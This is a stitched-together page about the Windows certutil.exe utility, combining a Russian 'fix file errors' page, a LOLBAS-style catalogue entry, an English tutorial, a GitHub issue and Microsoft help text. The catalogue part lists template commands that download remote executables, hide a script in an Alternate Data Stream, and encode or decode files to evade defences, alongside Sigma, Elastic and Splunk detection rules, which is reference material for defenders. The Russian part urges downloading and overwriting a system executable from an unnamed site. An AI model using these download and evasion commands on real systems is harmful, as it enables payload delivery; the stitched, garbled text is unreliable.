Иногда система Windows отображает сообщения об ошибках поврежденных или отсутствующих файлов certutil.exe. Подобные ситуации могут возникнуть, например, во время процесса установки программного обеспечения. Каждая программа требует определенных ресурсов, библиотек и исходных данных для правильной работы. Поэтому поврежденный или несуществующий файл certutil.exe может повлиять на неудачное выполнение запущенного процесса.
Файл был разработан для использования с программным обеспечением . Здесь вы найдете подробную информацию о файле и инструкции, как действовать в случае ошибок, связанных с certutil.exe на вашем устройстве. Вы также можете скачать файл certutil.exe, совместимый с устройствами Windows 10, Windows 8.1, Windows 8, Windows 7, Windows 7, Windows Vista, Windows Vista, которые (скорее всего) позволят решить проблему.
Совместим с: Windows 10, Windows 8.1, Windows 8, Windows 7, Windows 7, Windows Vista, Windows Vista
Популярность пользователя
Исправьте ошибки certutil.exe
- 1 Информация о файле certutil.exe
- 2 Ошибки, связанные с файлом certutil.exe
- 3 Как исправить ошибки, связанные с certutil.exe?
- 3.1 Сканирование на наличие вредоносных программ
- 3.2 Обновление системы и драйверов
- 3.3 Инструмент проверки системных файлов
- 3.4 Восстановление системы
- 4 Скачать certutil.exe
- 4.1 Список версий файла certutil.exe
Информация о файле
Основная информация | |
---|---|
Имя файла | certutil.exe |
Расширение файла | EXE |
Описание | CertUtil.exe |
Программного обеспечения | |
---|---|
программа | Microsoft® Windows® Operating System |
автор | Microsoft Corporation |
подробности | |
---|---|
MIME тип | application/octet-stream |
Тип файла | Executable application |
система | Windows NT 32-bit |
Авторские права | © Microsoft Corporation. All rights reserved. |
Набор символов | Unicode |
Языковая треска | English (U.S.) |
Наиболее распространенные проблемы с файлом certutil.exe
Существует несколько типов ошибок, связанных с файлом certutil.exe. Файл certutil.exe может находиться в неправильном каталоге файлов на вашем устройстве, может отсутствовать в системе или может быть заражен вредоносным программным обеспечением и, следовательно, работать неправильно. Ниже приведен список наиболее распространенных сообщений об ошибках, связанных с файлом certutil.exe. Если вы найдете один из перечисленных ниже (или похожих), рассмотрите следующие предложения.
- certutil.exe поврежден
- certutil.exe не может быть расположен
- Ошибка выполнения — certutil.exe
- Ошибка файла certutil.exe
- Файл certutil.exe не может быть загружен. Модуль не найден
- невозможно зарегистрировать файл certutil.exe
- Файл certutil.exe не может быть загружен
- Файл certutil.exe не существует
certutil.exe
Не удалось запустить приложение, так как отсутствует файл certutil.exe. Переустановите приложение, чтобы решить проблему.
OK
Проблемы, связанные с certutil.exe, могут решаться различными способами. Некоторые методы предназначены только для опытных пользователей. Если вы не уверены в своих силах, мы советуем обратиться к специалисту. К исправлению ошибок в файле certutil.exe следует подходить с особой осторожностью, поскольку любые ошибки могут привести к нестабильной или некорректно работающей системе. Если у вас есть необходимые навыки, пожалуйста, продолжайте.
Как исправить ошибки certutil.exe всего за несколько шагов?
Ошибки файла certutil.exe могут быть вызваны различными причинами, поэтому полезно попытаться исправить их различными способами.
Шаг 1.. Сканирование компьютера на наличие вредоносных программ.
Файлы Windows обычно подвергаются атаке со стороны вредоносного программного обеспечения, которое не позволяет им работать должным образом. Первым шагом в решении проблем с файлом certutil.exe или любыми другими системными файлами Windows должно быть сканирование системы на наличие вредоносных программ с использованием антивирусного инструмента.
Если по какой-либо причине в вашей системе еще не установлено антивирусное программное обеспечение, вы должны сделать это немедленно. Незащищенная система не только является источником ошибок в файлах, но, что более важно, делает вашу систему уязвимой для многих опасностей. Если вы не знаете, какой антивирусный инструмент выбрать, обратитесь к этой статье Википедии — сравнение антивирусного программного обеспечения.
Шаг 2.. Обновите систему и драйверы.
Установка соответствующих исправлений и обновлений Microsoft Windows может решить ваши проблемы, связанные с файлом certutil.exe. Используйте специальный инструмент Windows для выполнения обновления.
- Откройте меню «Пуск» в Windows.
- Введите «Центр обновления Windows» в поле поиска.
- Выберите подходящую программу (название может отличаться в зависимости от версии вашей системы)
- Проверьте, обновлена ли ваша система. Если в списке есть непримененные обновления, немедленно установите их.
- После завершения обновления перезагрузите компьютер, чтобы завершить процесс.
Помимо обновления системы рекомендуется установить последние версии драйверов устройств, так как драйверы могут влиять на правильную работу certutil.exe или других системных файлов. Для этого перейдите на веб-сайт производителя вашего компьютера или устройства, где вы найдете информацию о последних обновлениях драйверов.
Шаг 3.. Используйте средство проверки системных файлов (SFC).
Проверка системных файлов — это инструмент Microsoft Windows. Как следует из названия, инструмент используется для идентификации и адресации ошибок, связанных с системным файлом, в том числе связанных с файлом certutil.exe. После обнаружения ошибки, связанной с файлом %fileextension%, программа пытается автоматически заменить файл certutil.exe на исправно работающую версию. Чтобы использовать инструмент:
- Откройте меню «Пуск» в Windows.
- Введите «cmd» в поле поиска
- Найдите результат «Командная строка» — пока не запускайте его:
- Нажмите правую кнопку мыши и выберите «Запуск от имени администратора»
- Введите «sfc / scannow» в командной строке, чтобы запустить программу, и следуйте инструкциям.
Шаг 4. Восстановление системы Windows.
Другой подход заключается в восстановлении системы до предыдущего состояния до того, как произошла ошибка файла certutil.exe. Чтобы восстановить вашу систему, следуйте инструкциям ниже
- Откройте меню «Пуск» в Windows.
- Введите «Восстановление системы» в поле поиска.
- Запустите средство восстановления системы — его имя может отличаться в зависимости от версии системы.
- Приложение проведет вас через весь процесс — внимательно прочитайте сообщения
- После завершения процесса перезагрузите компьютер.
Если все вышеупомянутые методы завершились неудачно и проблема с файлом certutil.exe не была решена, перейдите к следующему шагу. Помните, что следующие шаги предназначены только для опытных пользователей
Загрузите и замените файл certutil.exe
Последнее решение — вручную загрузить и заменить файл certutil.exe в соответствующей папке на диске. Выберите версию файла, совместимую с вашей операционной системой, и нажмите кнопку «Скачать». Затем перейдите в папку «Загруженные» вашего веб-браузера и скопируйте загруженный файл certutil.exe.
Перейдите в папку, в которой должен находиться файл, и вставьте загруженный файл. Ниже приведен список путей к каталогу файлов certutil.exe.
- Windows 10: C:\Windows\System32\
- Windows 8.1: C:\Windows\System32\
- Windows 8: 1: C:\Windows\System32\
- Windows 7: C:\Windows\SysWOW64\
- Windows 7: C:\Windows\SysWOW64\
- Windows Vista: —
- Windows Vista: —
Если действия не помогли решить проблему с файлом certutil.exe, обратитесь к профессионалу. Существует вероятность того, что ошибка (и) может быть связана с устройством и, следовательно, должна быть устранена на аппаратном уровне. Может потребоваться новая установка операционной системы — неправильный процесс установки системы может привести к потере данных.
Список версий файлов
Имя файла
certutil.exe
система
Windows 10
Размер файла
1171968 bytes
Дата
2017-03-18
Подробности файла | ||
---|---|---|
MD5 | 6dd295c9f31ea47b1490e8f95d328c21 | |
SHA1 | 3337c8b3e8e6755cbb65f674fc075446bf7ef346 | |
SHA256 | 05323733c0c5d08f3cfc83bc80cb67de74a20a2364fffa5a893bc2eed7600bfe | |
CRC32 | 9f10cad5 | |
Пример расположения файла | C:\Windows\System32\ |
Имя файла
certutil.exe
система
Windows 8.1
Размер файла
1060352 bytes
Дата
2014-11-21
Подробности файла | ||
---|---|---|
MD5 | b72b52259e744b7c2d174fc69d422d83 | |
SHA1 | c6f57002eca410ca0209a4a2daaf0253b02b3576 | |
SHA256 | d3542293ce94ba14e04e051e4054b6675bdb8e3b28709a456799e26c9e459796 | |
CRC32 | 5cfe6611 | |
Пример расположения файла | C:\Windows\System32\ |
Имя файла
certutil.exe
система
Windows 8
Размер файла
1004544 bytes
Дата
2012-07-26
Подробности файла | ||
---|---|---|
MD5 | eadd825bb96f91424e4e679dfd318b3d | |
SHA1 | ad4e6ed2db0cf771d37946593e162b8d459f6407 | |
SHA256 | 881f5b30b09115f476a561bcc624be0a2db64edd113dec00d8e44a2c5bc43773 | |
CRC32 | b682ba6e | |
Пример расположения файла | 1: C:\Windows\System32\ |
Имя файла
certutil.exe
система
Windows 7
Размер файла
889856 bytes
Дата
-0001-11-30
Подробности файла | ||
---|---|---|
MD5 | 7b973145f7e1b59330ca4dd1f86b3d55 | |
SHA1 | 10ce9174bff4856083e6adad0094a798ced2c079 | |
SHA256 | 589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4 | |
CRC32 | 374193ba | |
Пример расположения файла | C:\Windows\SysWOW64\ |
Имя файла
certutil.exe
система
Windows 7
Размер файла
1175552 bytes
Дата
-0001-11-30
Подробности файла | ||
---|---|---|
MD5 | ec1fd3050dbc40ec7e87ab99c7ca0b03 | |
SHA1 | ae7fdfc29f4ef31e38ebf381e61b503038b5cb35 | |
SHA256 | 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3 | |
CRC32 | 3ddfa9f5 | |
Пример расположения файла | C:\Windows\SysWOW64\ |
Имя файла
certutil.exe
система
Windows Vista
Размер файла
799744 bytes
Дата
-0001-11-30
Подробности файла | ||
---|---|---|
MD5 | 4533f3b0e9ad11a1c02b191f5d873de2 | |
SHA1 | 0b96ed44491dd213fef994f89d8cd2530dba4c02 | |
SHA256 | 3d5de4a1dc17e8f70676bf187d9df932e22dbeba03192996537675e955bb3fa8 | |
CRC32 | d4d76e40 | |
Пример расположения файла | — |
Имя файла
certutil.exe
система
Windows Vista
Размер файла
1060864 bytes
Дата
2009-04-11
Подробности файла | ||
---|---|---|
MD5 | c4aa6e59a319e5d51470d1809b1354c4 | |
SHA1 | 74c5e18a303982e4dfd59eab0eccd4258e99299f | |
SHA256 | 2eb9e0e586d0f67167d639135c3fee26d9a15811a924f8996301ea15f717ddf5 | |
CRC32 | a71d1d61 | |
Пример расположения файла | — |
.. /Certutil.exe
Windows binary used for handling certificates
Paths:
- C:\Windows\System32\certutil.exe
- C:\Windows\SysWOW64\certutil.exe
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
- https://twitter.com/mattifestation/status/620107926288515072
- https://twitter.com/egre55/status/1087685529016193025
Acknowledgements:
- Matt Graeber (@mattifestation)
- Moriarty (@Moriarty_Meng)
- egre55 (@egre55)
- Lior Adar
Detections:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml
- Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml
- IOC: Certutil.exe creating new files on disk
- IOC: Useragent Microsoft-CryptoAPI/10.0
- IOC: Useragent CertUtil URL Agent
Download
-
Download and save executable to disk in the current folder.
certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
- Use case
- Download file from Internet
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1105
-
Download and save executable to disk in the current folder.
certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
- Use case
- Download file from Internet
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1105
Alternate data streams
-
Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
- Use case
- Download file from Internet and save it in an NTFS Alternate Data Stream
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1564.004
Encode
-
Command to encode a file using Base64
certutil -encode {PATH} {PATH:.base64}
- Use case
- Encode files to evade defensive measures
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1027.013
Decode
-
Command to decode a Base64 encoded file.
certutil -decode {PATH:.base64} {PATH}
- Use case
- Decode files to evade defensive measures
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1140
-
Command to decode a hexadecimal-encoded file.
certutil -decodehex {PATH:.hex} {PATH}
- Use case
- Decode files to evade defensive measures
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1140
WINDOWS
When it comes to managing digital certificates in Windows, certutil.exe stands out as a powerful command-line tool included in the Windows operating system. This utility plays a critical role in system administrators’ and security personnel’s toolkit, enabling management, validation, and troubleshooting of certificates and their associated files. In this article, we’ll explore the functionality, usage, and structure of certutil.exe, including its location on your system, command syntax, and practical applications.
Understanding certutil.exe
What is certutil.exe?
certutil.exe is a part of the Windows Certificate Services and it provides a variety of functionalities related to digital certificates. It is primarily used to manage Public Key Infrastructure (PKI) environments, allowing users to create, manage, and retrieve certificates along with other related tasks.
Location of certutil.exe
In a typical installation, certutil.exe is a binary Portable Executable (PE) file located in the system directory at:
%windir%\system32\certutil.exe
On 64-bit versions of Windows, you can find it in:
C:\Windows\System32\certutil.exe
It is important to note that on 32-bit versions, the executable can be found in:
C:\Windows\SysWOW64\certutil.exe
Core Functionalities of certutil.exe
certutil.exe comes with a wide array of features that allow for various certificate management tasks. Below are some of the key functionalities:
1. Certificate Retrieval and Validation
-
Retrieve Certificates: Fetch certificates from a specified certificate store.
-
Validate Certificates: Check the validity of a given certificate chain and provide error details if any issues exist.
2. Certificate Management
-
Add/Remove Certificates: You can add or delete certificates from certificate stores.
-
Export/Import Certificates: Transfer certificates in different formats (e.g., PFX, CER).
3. Certificate Authority (CA) Operations
-
CA Management: Administer Certificate Authorities, view their status, and manage their configurations.
-
Revocation List Management: Publish or check Certificate Revocation Lists (CRLs).
4. Base64 Encoding/Decoding
-
Convert Certificates: Utilize certutil to encode or decode certificate files, which is useful for transmitting certificates over media that might not handle binary data well.
Command Syntax
The basic command format for using certutil.exe is:
certutil [-set| -get] [parameters]
Commonly Used Commands
Here’s a brief overview of some essential commands characteristic of certutil.exe:
-
List Certificates:
-
Export Certificate:
certutil -exportpfx MyCertificate.pfx -p "your_password" -user
-
Display Certificate Details:
certutil -dump your_certificate.cer
-
Check Certificate Chain:
certutil -verify your_certificate.cer
Examples:
Example 1: Listing Certificates
To list all certificates in the Personal store:
Example 2: Exporting a Certificate
To export a certificate identified by its serial number into a PFX file:
certutil -exportpfx -p "your_password" "SerialNumber" output.pfx
Troubleshooting with certutil.exe
When working with certificates, you may encounter errors or issues that require troubleshooting. Here’s how certutil.exe can assist:
Common Errors and Their Solutions
-
Invalid Certificate Error: Running
certutil -verify
may show an “Invalid” status. In this case, ensure that:-
The certificate is expired.
-
The certificate chain is incomplete.
-
-
Revoked Certificates: If a certificate is reported as revoked, use:
certutil -urlfetch -verify your_certificate.cer
This command checks against CRLs to determine the certificate’s status.
Conclusion
certutil.exe is an indispensable tool for Windows administrators and cybersecurity professionals who need to manage and validate certificates effectively. Understanding how to navigate its functions not only aids in maintaining digital security but also provides a robust solution for troubleshooting certificate-related issues.
Key Takeaways:
-
Location: Found under
%windir%\system32\certutil.exe
. -
Functionality: Includes retrieval, management, and validation of digital certificates.
-
Command Syntax: Offers a flexible command syntax for various operations.
-
Troubleshooting: Provides significant assistance in diagnosing certificate issues.
By incorporating certutil.exe into your repertoire, you can better manage digital certificates, ensuring robust infrastructure security and compliance within your organization.
Suggested Articles
WINDOWS
WINDOWS
WINDOWS
WINDOWS
WINDOWS
WINDOWS
This repository was archived by the owner on Apr 29, 2021. It is now read-only.
This repository was archived by the owner on Apr 29, 2021. It is now read-only.
Description
Description of Issue:
While running the certutil -verify -urlfetch mypiv_auth.cer
command to verify the revocation status of my PIV auth certificate, certutil is throwing the error:
Cannot find object or property. 0x80092004 (-2146885628 CRYPT_E_NOT_FOUND)
- Using the same certificate and running the same certutil command on a Windows 7 workstation works fine.
- PIV login is working for Windows 10, so don’t think there is any big issue using Windows 10, but may need to update Playbook to specify Windows 10 may throw this error when running certutil command.
Details of Issue:
Receiving error:
Cannot find object or property. 0x80092004 (-2146885628 CRYPT_E_NOT_FOUND)
CertUtil: -verify command FAILED: 0x80092004 (-2146885628 CRYPT_E_NOT_FOUND)
CertUtil: Cannot find object or property.
References (Docs, Links, Files):
- Following guidance on https://piv.idmanagement.gov/networkconfig/ports/ for running certutil command
If a New Page or Content is Needed, Expected Outcomes:
Link to the Content Page for Contributors:
Certutil.exe is a command-line program that is installed as part of Certificate Services in the Windows Server 2003 family.
You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.
For more information about how to use Certutil.exe to perform specific tasks, see the following topics:
•Certutil tasks for encoding and decoding certificates
http://technet.microsoft.com/en-us/library/cc772656(v=ws.10).aspx
•Certutil tasks for configuring a Certification Authority (CA)
http://technet.microsoft.com/en-us/library/cc772627(v=ws.10).aspx
•Certutil tasks for managing a Certification Authority (CA)
http://technet.microsoft.com/en-us/library/cc772751(v=ws.10).aspx
•Certutil tasks for managing certificates
http://technet.microsoft.com/en-us/library/cc772898(v=ws.10).aspx
•Certutil tasks for managing CRLs
http://technet.microsoft.com/en-us/library/cc772629(v=ws.10).aspx
•Certutil tasks for key archival and recovery
http://technet.microsoft.com/en-us/library/cc738780(v=ws.10).aspx
•Certutil tasks for backing up and restoring certificates
http://technet.microsoft.com/en-us/library/cc755341(v=ws.10).aspx
•Certutil tasks for troubleshooting certificates
http://technet.microsoft.com/en-us/library/cc772619(v=ws.10).aspx
To display the certificates in the Local Machine certificate store
Syntax
certutil-store [-f] [-enterprise] [-user] [-gmt] [-seconds] [-silent] [-v] [-dc DCName] CertificateStoreName [CertID [OutFile]]]
CertificateStoreName Specifies one of the following store names:
ca Specifies certificates in the Intermediate Certification Authorities store.
my Specifies certificates issued to the current user.
root Specifies certificates in the Trusted Root Certification Authorities store.
spc Specifies software publisher certificates.
UserCreatedStore Specifies the name of a user-created certificate store.
Eg.
C:\windows\system32>certutil -store
CA
================ Certificate 0 ================
Serial Number: 06376c00aa00648a11cfb8d4aa5c35f4
Issuer: CN=Root Agency
NotBefore: 29-05-1996 03:32
NotAfter: 01-01-2040 05:29
Subject: CN=Root Agency
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template:
Cert Hash(sha1): fe e4 49 ee 0e 39 65 a5 24 6f 00 0e 87 fd e2 a0 65 fd 89 d4
No key provider information
Cannot find the certificate and private key for decryption.
================ Certificate 1 ================
Serial Number: 46fcebbab4d02f0f926098233f93078f
Issuer: OU=Class 3 Public Primary Certification Authority, O=VeriSign, Inc., C=U
S
NotBefore: 17-04-1997 05:30
NotAfter: 25-10-2016 05:29
Subject: OU=www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign, OU
=VeriSign International Server CA – Class 3, OU=VeriSign, Inc., O=VeriSign Trust
Network
Non-root Certificate
Template:
Cert Hash(sha1): d5 59 a5 86 66 9b 08 f4 6a 30 a1 33 f8 a9 ed 3d 03 8e 2e a8
No key provider information
Cannot find the certificate and private key for decryption.
================ Certificate 2 ================
Serial Number: 198b11d13f9a8ffe69a0
Issuer: CN=Microsoft Root Authority, OU=Microsoft Corporation, OU=Copyright (c)
1997 Microsoft Corp.
NotBefore: 01-10-1997 12:30
NotAfter: 31-12-2002 12:30
Subject: CN=Microsoft Windows Hardware Compatibility, OU=Microsoft Corporation,
OU=Microsoft Windows Hardware Compatibility Intermediate CA, OU=Copyright (c) 19
97 Microsoft Corp.
Non-root Certificate
Template:
Cert Hash(sha1): 10 9f 1c ae d6 45 bb 78 b3 ea 2b 94 c0 69 7c 74 07 33 03 1c
No key provider information
Cannot find the certificate and private key for decryption.
================ CRL 0 ================
Issuer:
OU=VeriSign Commercial Software Publishers CA
O=VeriSign, Inc.
L=Internet
CRL Hash(sha1): a3 77 d1 b1 c0 53 88 33 03 52 11 f4 08 3d 00 fe cc 41 4d ab
CertUtil: -store command completed successfully.
usages
>certutil -?
Verbs:
-dump — Dump configuration information or files
-asn — Parse ASN.1 file
-decodehex — Decode hexadecimal-encoded file
-decode — Decode Base64-encoded file
-encode — Encode file to Base64
-deny — Deny pending request
-resubmit — Resubmit pending request
-setattributes — Set attributes for pending request
-setextension — Set extension for pending request
-revoke — Revoke Certificate
-isvalid — Display current certificate disposition
-getconfig — Get default configuration string
-ping — Ping Active Directory Certificate Services Request interf
ace
-pingadmin — Ping Active Directory Certificate Services Admin interfac
e
-CAInfo — Display CA Information
-ca.cert — Retrieve the CA’s certificate
-ca.chain — Retrieve the CA’s certificate chain
-GetCRL — Get CRL
-CRL — Publish new CRLs [or delta CRLs only]
-shutdown — Shutdown Active Directory Certificate Services
-installCert — Install Certification Authority certificate
-renewCert — Renew Certification Authority certificate
-schema — Dump Certificate Schema
-view — Dump Certificate View
-db — Dump Raw Database
-deleterow — Delete server database row
-backup — Backup Active Directory Certificate Services
-backupDB — Backup Active Directory Certificate Services database
-backupKey — Backup Active Directory Certificate Services certificate
and private key
-restore — Restore Active Directory Certificate Services
-restoreDB — Restore Active Directory Certificate Services database
-restoreKey — Restore Active Directory Certificate Services certificate
and private key
-importPFX — Import certificate and private key
-dynamicfilelist — Display dynamic file List
-databaselocations — Display database locations
-hashfile — Generate and display cryptographic hash over a file
-store — Dump certificate store
-addstore — Add certificate to store
-delstore — Delete certificate from store
-verifystore — Verify certificate in store
-repairstore — Repair key association or update certificate properties o
r key security descriptor
-viewstore — Dump certificate store
-viewdelstore — Delete certificate from store
-dsPublish — Publish certificate or CRL to Active Directory
-ADTemplate — Display AD templates
-Template — Display Enrollment Policy templates
-TemplateCAs — Display CAs for template
-CATemplates — Display templates for CA
-enrollmentServerURL — Display, add or delete enrollment server URLs associat
ed with a CA
-ADCA — Display AD CAs
-CA — Display Enrollment Policy CAs
-Policy — Display Enrollment Policy
-PolicyCache — Display or delete Enrollment Policy Cache entries
-CredStore — Display, add or delete Credential Store entries
-InstallDefaultTemplates — Install default certificate templates
-URLCache — Display or delete URL cache entries
-pulse — Pulse autoenrollment events
-MachineInfo — Display Active Directory machine object information
-DCInfo — Display domain controller information
-EntInfo — Display enterprise information
-TCAInfo — Display CA information
-SCInfo — Display smart card information
-SCRoots — Manage smart card root certificates
-verifykeys — Verify public/private key set
-verify — Verify certificate, CRL or chain
-sign — Re-sign CRL or certificate
-vroot — Create/delete web virtual roots and file shares
-vocsproot — Create/delete web virtual roots for OCSP web proxy
-addEnrollmentServer — Add an Enrollment Server application
-deleteEnrollmentServer — Delete an Enrollment Server application
-oid — Display ObjectId or set display name
-error — Display error code message text
-getreg — Display registry value
-setreg — Set registry value
-delreg — Delete registry value
-ImportKMS — Import user keys and certificates into server database fo
r key archival
-ImportCert — Import a certificate file into the database
-GetKey — Retrieve archived private key recovery blob
-RecoverKey — Recover archived private key
-MergePFX — Merge PFX files
-ConvertEPF — Convert PFX files to EPF file
-? — Display this usage message
CertUtil -? — Display a verb list (command list)
CertUtil -dump -? — Display help text for the “dump” verb
CertUtil -v -? — Display all help text for all verbs
Refferences
http://technet.microsoft.com/en-in/library/cc732443.aspx
http://ss64.com/nt/certutil.html
http://technet.microsoft.com/en-us/library/cc772898(v=ws.10).aspx